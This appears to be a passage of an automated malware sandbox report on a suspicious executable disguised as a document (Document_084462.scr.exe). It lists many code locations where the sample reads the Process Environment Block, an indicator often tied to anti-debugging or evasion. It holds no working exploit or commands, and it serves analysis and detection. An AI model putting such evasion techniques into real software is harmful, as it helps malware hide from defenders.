            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ABB360 mov eax, dword ptr fs:[00000030h]1_2_37ABB360
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8B2BC mov eax, dword ptr fs:[00000030h]1_2_37B8B2BC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA92AF mov eax, dword ptr fs:[00000030h]1_2_37AA92AF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F2AE mov eax, dword ptr fs:[00000030h]1_2_37B6F2AE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B792AB mov eax, dword ptr fs:[00000030h]1_2_37B792AB
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7290 mov eax, dword ptr fs:[00000030h]1_2_37AB7290
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7290 mov eax, dword ptr fs:[00000030h]1_2_37AB7290
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7290 mov eax, dword ptr fs:[00000030h]1_2_37AB7290
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD2EC mov eax, dword ptr fs:[00000030h]1_2_37AAD2EC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD2EC mov eax, dword ptr fs:[00000030h]1_2_37AAD2EC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA72E0 mov eax, dword ptr fs:[00000030h]1_2_37AA72E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD32C5 mov eax, dword ptr fs:[00000030h]1_2_37AD32C5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B532DF mov eax, dword ptr fs:[00000030h]1_2_37B532DF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE32C0 mov eax, dword ptr fs:[00000030h]1_2_37AE32C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE32C0 mov eax, dword ptr fs:[00000030h]1_2_37AE32C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B832C9 mov eax, dword ptr fs:[00000030h]1_2_37B832C9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3B214 mov eax, dword ptr fs:[00000030h]1_2_37B3B214
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B3B214 mov eax, dword ptr fs:[00000030h]1_2_37B3B214
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6D270 mov eax, dword ptr fs:[00000030h]1_2_37B6D270
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4327E mov eax, dword ptr fs:[00000030h]1_2_37B4327E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB273 mov eax, dword ptr fs:[00000030h]1_2_37AAB273
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB273 mov eax, dword ptr fs:[00000030h]1_2_37AAB273
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB273 mov eax, dword ptr fs:[00000030h]1_2_37AAB273
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2D250 mov eax, dword ptr fs:[00000030h]1_2_37B2D250
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2D250 mov ecx, dword ptr fs:[00000030h]1_2_37B2D250
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF24A mov eax, dword ptr fs:[00000030h]1_2_37ADF24A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F247 mov eax, dword ptr fs:[00000030h]1_2_37B6F247
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B7124C mov eax, dword ptr fs:[00000030h]1_2_37B7124C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B851B6 mov eax, dword ptr fs:[00000030h]1_2_37B851B6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE31BE mov eax, dword ptr fs:[00000030h]1_2_37AE31BE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE31BE mov eax, dword ptr fs:[00000030h]1_2_37AE31BE
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD9194 mov eax, dword ptr fs:[00000030h]1_2_37AD9194
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1190 mov eax, dword ptr fs:[00000030h]1_2_37AF1190
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AF1190 mov eax, dword ptr fs:[00000030h]1_2_37AF1190
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4D1F0 mov eax, dword ptr fs:[00000030h]1_2_37B4D1F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADB1E0 mov eax, dword ptr fs:[00000030h]1_2_37ADB1E0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB91E5 mov eax, dword ptr fs:[00000030h]1_2_37AB91E5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB91E5 mov eax, dword ptr fs:[00000030h]1_2_37AB91E5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA91F0 mov eax, dword ptr fs:[00000030h]1_2_37AA91F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA91F0 mov eax, dword ptr fs:[00000030h]1_2_37AA91F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF1F0 mov eax, dword ptr fs:[00000030h]1_2_37ADF1F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADF1F0 mov eax, dword ptr fs:[00000030h]1_2_37ADF1F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC51C0 mov eax, dword ptr fs:[00000030h]1_2_37AC51C0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7128 mov eax, dword ptr fs:[00000030h]1_2_37AE7128
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE7128 mov eax, dword ptr fs:[00000030h]1_2_37AE7128
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6F13E mov eax, dword ptr fs:[00000030h]1_2_37B6F13E
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD510F mov eax, dword ptr fs:[00000030h]1_2_37AD510F
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB510D mov eax, dword ptr fs:[00000030h]1_2_37AB510D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAF113 mov eax, dword ptr fs:[00000030h]1_2_37AAF113
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE716D mov eax, dword ptr fs:[00000030h]1_2_37AE716D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B0717A mov eax, dword ptr fs:[00000030h]1_2_37B0717A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B0717A mov eax, dword ptr fs:[00000030h]1_2_37B0717A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B83157 mov eax, dword ptr fs:[00000030h]1_2_37B83157
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B83157 mov eax, dword ptr fs:[00000030h]1_2_37B83157
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B83157 mov eax, dword ptr fs:[00000030h]1_2_37B83157
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B85149 mov eax, dword ptr fs:[00000030h]1_2_37B85149
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4D140 mov eax, dword ptr fs:[00000030h]1_2_37B4D140
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4D140 mov eax, dword ptr fs:[00000030h]1_2_37B4D140
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4314A mov eax, dword ptr fs:[00000030h]1_2_37B4314A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4314A mov eax, dword ptr fs:[00000030h]1_2_37B4314A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4314A mov eax, dword ptr fs:[00000030h]1_2_37B4314A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B4314A mov eax, dword ptr fs:[00000030h]1_2_37B4314A
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B850B7 mov eax, dword ptr fs:[00000030h]1_2_37B850B7
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B5F0A5 mov eax, dword ptr fs:[00000030h]1_2_37B5F0A5
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6B0AF mov eax, dword ptr fs:[00000030h]1_2_37B6B0AF
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B37090 mov eax, dword ptr fs:[00000030h]1_2_37B37090
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA90F8 mov eax, dword ptr fs:[00000030h]1_2_37AA90F8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA90F8 mov eax, dword ptr fs:[00000030h]1_2_37AA90F8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA90F8 mov eax, dword ptr fs:[00000030h]1_2_37AA90F8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA90F8 mov eax, dword ptr fs:[00000030h]1_2_37AA90F8
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AED0F0 mov eax, dword ptr fs:[00000030h]1_2_37AED0F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AED0F0 mov ecx, dword ptr fs:[00000030h]1_2_37AED0F0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACB0D0 mov eax, dword ptr fs:[00000030h]1_2_37ACB0D0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB0D6 mov eax, dword ptr fs:[00000030h]1_2_37AAB0D6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB0D6 mov eax, dword ptr fs:[00000030h]1_2_37AAB0D6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB0D6 mov eax, dword ptr fs:[00000030h]1_2_37AAB0D6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAB0D6 mov eax, dword ptr fs:[00000030h]1_2_37AAB0D6
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAD02D mov eax, dword ptr fs:[00000030h]1_2_37AAD02D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD5004 mov eax, dword ptr fs:[00000030h]1_2_37AD5004
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AD5004 mov ecx, dword ptr fs:[00000030h]1_2_37AD5004
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B59060 mov eax, dword ptr fs:[00000030h]1_2_37B59060
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB7072 mov eax, dword ptr fs:[00000030h]1_2_37AB7072
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B8505B mov eax, dword ptr fs:[00000030h]1_2_37B8505B
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1051 mov eax, dword ptr fs:[00000030h]1_2_37AB1051
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1051 mov eax, dword ptr fs:[00000030h]1_2_37AB1051
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1FAA mov eax, dword ptr fs:[00000030h]1_2_37AB1FAA
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADBF93 mov eax, dword ptr fs:[00000030h]1_2_37ADBF93
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AABFC0 mov eax, dword ptr fs:[00000030h]1_2_37AABFC0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FFDC mov eax, dword ptr fs:[00000030h]1_2_37B2FFDC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FFDC mov eax, dword ptr fs:[00000030h]1_2_37B2FFDC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FFDC mov eax, dword ptr fs:[00000030h]1_2_37B2FFDC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FFDC mov ecx, dword ptr fs:[00000030h]1_2_37B2FFDC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FFDC mov eax, dword ptr fs:[00000030h]1_2_37B2FFDC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FFDC mov eax, dword ptr fs:[00000030h]1_2_37B2FFDC
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AA9FD0 mov eax, dword ptr fs:[00000030h]1_2_37AA9FD0
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B31FC9 mov eax, dword ptr fs:[00000030h]1_2_37B31FC9
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACDF36 mov eax, dword ptr fs:[00000030h]1_2_37ACDF36
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACDF36 mov eax, dword ptr fs:[00000030h]1_2_37ACDF36
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACDF36 mov eax, dword ptr fs:[00000030h]1_2_37ACDF36
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ACDF36 mov eax, dword ptr fs:[00000030h]1_2_37ACDF36
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AAFF30 mov edi, dword ptr fs:[00000030h]1_2_37AAFF30
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEBF0C mov eax, dword ptr fs:[00000030h]1_2_37AEBF0C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEBF0C mov eax, dword ptr fs:[00000030h]1_2_37AEBF0C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AEBF0C mov eax, dword ptr fs:[00000030h]1_2_37AEBF0C
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FF03 mov eax, dword ptr fs:[00000030h]1_2_37B2FF03
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FF03 mov eax, dword ptr fs:[00000030h]1_2_37B2FF03
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B2FF03 mov eax, dword ptr fs:[00000030h]1_2_37B2FF03
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AABF70 mov eax, dword ptr fs:[00000030h]1_2_37AABF70
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AB1F70 mov eax, dword ptr fs:[00000030h]1_2_37AB1F70
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B53F54 mov eax, dword ptr fs:[00000030h]1_2_37B53F54
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B53F54 mov eax, dword ptr fs:[00000030h]1_2_37B53F54
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37B6BF4D mov eax, dword ptr fs:[00000030h]1_2_37B6BF4D
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov eax, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov eax, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov eax, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov ecx, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AC1EB2 mov eax, dword ptr fs:[00000030h]1_2_37AC1EB2
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37ADBE80 mov eax, dword ptr fs:[00000030h]1_2_37ADBE80
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE1EED mov eax, dword ptr fs:[00000030h]1_2_37AE1EED
            Source: C:\Users\user\Desktop\Document_084462.scr.exeCode function: 1_2_37AE1EED mov eax, dword ptr fs:[00000030h]1_2_37AE1EED
